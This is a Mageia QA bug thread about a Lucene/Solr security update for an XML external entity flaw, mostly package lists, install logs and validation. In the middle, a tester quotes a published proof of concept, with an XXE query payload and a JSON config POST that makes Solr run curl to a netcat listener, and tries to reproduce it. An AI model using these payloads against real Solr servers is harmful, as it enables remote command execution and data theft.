Fedora has issued an advisory on October 31: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4VSRNALKTFGMXF7R2WI7KXI3NSLHT7FM/ Mageia 6 is also affected. Mageia 5 is not affected.
CC: (none) => geiger.david68210Whiteboard: (none) => MGA6TOO
Fedora advisory from November 1 (corresponds to Mageia 6 version): https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GTE5P6CWLVBPWNLR3RMLZGEFUYCZZR5V/
Fixed for Cauldron and mga6!
Advisory: ======================== Updated lucene packages fix security vulnerability: It was found that the CoreParser class in Lucene accepts doctype declaration and expands external entities. An attacker could use this flaw to bypass security restrictions and access sensitive data (CVE-2017-12629). References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12629 https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GTE5P6CWLVBPWNLR3RMLZGEFUYCZZR5V/ ======================== Updated packages in core/updates_testing: ======================== lucene-5.5.0-4.1.mga6 lucene-parent-5.5.0-4.1.mga6 lucene-solr-grandparent-5.5.0-4.1.mga6 lucene-backward-codecs-5.5.0-4.1.mga6 lucene-benchmark-5.5.0-4.1.mga6 lucene-replicator-5.5.0-4.1.mga6 lucene-grouping-5.5.0-4.1.mga6 lucene-highlighter-5.5.0-4.1.mga6 lucene-misc-5.5.0-4.1.mga6 lucene-test-framework-5.5.0-4.1.mga6 lucene-memory-5.5.0-4.1.mga6 lucene-expressions-5.5.0-4.1.mga6 lucene-demo-5.5.0-4.1.mga6 lucene-classification-5.5.0-4.1.mga6 lucene-join-5.5.0-4.1.mga6 lucene-suggest-5.5.0-4.1.mga6 lucene-facet-5.5.0-4.1.mga6 lucene-analysis-5.5.0-4.1.mga6 lucene-sandbox-5.5.0-4.1.mga6 lucene-queries-5.5.0-4.1.mga6 lucene-spatial-5.5.0-4.1.mga6 lucene-spatial3d-5.5.0-4.1.mga6 lucene-codecs-5.5.0-4.1.mga6 lucene-queryparser-5.5.0-4.1.mga6 lucene-analyzers-smartcn-5.5.0-4.1.mga6 lucene-analyzers-phonetic-5.5.0-4.1.mga6 lucene-analyzers-icu-5.5.0-4.1.mga6 lucene-analyzers-morfologik-5.5.0-4.1.mga6 lucene-analyzers-uima-5.5.0-4.1.mga6 lucene-analyzers-kuromoji-5.5.0-4.1.mga6 lucene-analyzers-stempel-5.5.0-4.1.mga6 lucene-javadoc-5.5.0-4.1.mga6 from lucene-5.5.0-4.1.mga6.src.rpm
CC: (none) => mageiaAssignee: mageia => qa-bugsVersion: Cauldron => 6Whiteboard: MGA6TOO => (none)
Keywords: (none) => advisoryCC: (none) => lewyssmith
CC: lewyssmith => (none)
Mageia 6 on x86_64 Before updating, all the lucene packages were installed, over 200 of them. Read this first: http://www.lucenetutorial.com/basic-concepts.html Lucene In Five Minutes provides a 'Hello World' type application The first hurdle was to find javac. Install java-1.8.0-openjdk-devel. The second hurdle is insurmountable - note that the tutorial says the program is complete: $ javac HelloLucene.java HelloLucene.java:1: error: package org.apache.lucene.analysis.standard does not exist import org.apache.lucene.analysis.standard.StandardAnalyzer; and a whole load of similar errors. So there must be another element of lucene missing. Reproducing the issues is a complex business involving cut and paste. A way to demonstrate the vulnerabilities has been posted by Michael Stepankin & Olga Barinova https://www.exploit-db.com/exploits/43009/ a: 1) Set up a listener on any port by using netcat command "nc -lv 4444" 2) Open http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'} b: 1) Create a new collection http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2 2) Set up a listener on any port by using netcat command "nc -lv 4444" 3) Add a new RunExecutableListener listener for the collection where "exe" attribute contents the name of running command ("/usr/bin/curl") and "args" attribute contents "http://localhost:39601/executed" value to make a request to the attacker's netcat listener: POST /solr/newcollection/config HTTP/1.1 Host: localhost:8983 Connection: close Content-Type: application/json Content-Length: 198 { "add-listener" : { "event":"postCommit", "name":"newlistener", "class":"solr.RunExecutableListener", "exe":"curl", "dir":"/usr/bin/", "args":["http://localhost:4444/executed"] } } 4) Update "newcollection" to trigger execution of RunExecutableListener: POST /solr/newcollection/update HTTP/1.1 Host: localhost:8983 Connection: close Content-Type: application/json Content-Length: 19 [{"id":"test"}] 5) ou will see a request from the Solr server on your netcat listener. It proves that the curl command is executed on the server. They also describe how the vulnerabilities can be chained to provide remote code execution.... Install netcat-traditional for the nc command if it cannot be found. Opened port 4444 as /tcp and /udp. $ nc -lv 4444 4444: inverse host lookup failed: Unknown host listening on [any] 39601 ... Cut and pasted the http command into firefox: http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2 Unable to connect Firefox can't establish a connection to the server at localhost:8983 Going to pass this one on to somebody/anybody with more experience of both java and web applications. Meanwhile I can verify that the updates installed cleanly; 32 specific components.
CC: (none) => tarazed25
In VirtualBox, M6, Plasma, 64-bit Package(s) under test: lucene lucene-parent lucene-backward-codecs lucene-benchmark lucene-replicator lucene-grouping default install of lucene lucene-parent lucene-backward-codecs & lucene-benchmark lucene-replicator lucene-grouping 185 packages installed [root@localhost wilcal]# urpmi lucene Package lucene-5.5.0-4.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-parent Package lucene-parent-5.5.0-4.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-backward-codecs Package lucene-backward-codecs-5.5.0-4.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-benchmark Package lucene-benchmark-5.5.0-4.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-replicator Package lucene-replicator-5.5.0-4.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-grouping Package lucene-grouping-5.5.0-4.mga6.noarch is already installed 185 packages installed without error install lucene lucene-parent lucene-backward-codecs lucene-benchmark lucene-replicator lucene-grouping from updates_testing [root@localhost wilcal]# urpmi lucene Package lucene-5.5.0-4.1.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-parent Package lucene-parent-5.5.0-4.1.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-backward-codecs Package lucene-backward-codecs-5.5.0-4.1.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-benchmark Package lucene-benchmark-5.5.0-4.1.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-replicator Package lucene-replicator-5.5.0-4.1.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-grouping Package lucene-grouping-5.5.0-4.1.mga6.noarch is already installed All packages installed without error
CC: (none) => wilcal.int
In VirtualBox, M6, Plasma, 32-bit Package(s) under test: lucene lucene-parent lucene-backward-codecs lucene-benchmark lucene-replicator lucene-grouping default install of lucene lucene-parent lucene-backward-codecs & lucene-benchmark lucene-replicator lucene-grouping 185 packages installed [root@localhost wilcal]# urpmi lucene Package lucene-5.5.0-4.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-parent Package lucene-parent-5.5.0-4.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-backward-codecs Package lucene-backward-codecs-5.5.0-4.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-benchmark Package lucene-benchmark-5.5.0-4.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-replicator Package lucene-replicator-5.5.0-4.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-grouping Package lucene-grouping-5.5.0-4.mga6.noarch is already installed 185 packages installed without error install lucene lucene-parent lucene-backward-codecs lucene-benchmark lucene-replicator lucene-grouping from updates_testing [root@localhost wilcal]# urpmi lucene Package lucene-5.5.0-4.1.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-parent Package lucene-parent-5.5.0-4.1.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-backward-codecs Package lucene-backward-codecs-5.5.0-4.1.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-benchmark Package lucene-benchmark-5.5.0-4.1.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-replicator Package lucene-replicator-5.5.0-4.1.mga6.noarch is already installed [root@localhost wilcal]# urpmi lucene-grouping Package lucene-grouping-5.5.0-4.1.mga6.noarch is already installed All packages installed without error
I don't know how much more you can do with this other then starting a career understanding it.
William is right. Let's move this along.
This update works fine. Testing complete for MGA6, 32-bit & 64-bit Validating the update. Could someone from the sysadmin team push to updates. Thanks
Whiteboard: (none) => MGA6-32-OK MGA6-64-OK
Keywords: (none) => validated_updateCC: (none) => sysadmin-bugs
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2017-0403.html
Status: NEW => RESOLVEDResolution: (none) => FIXED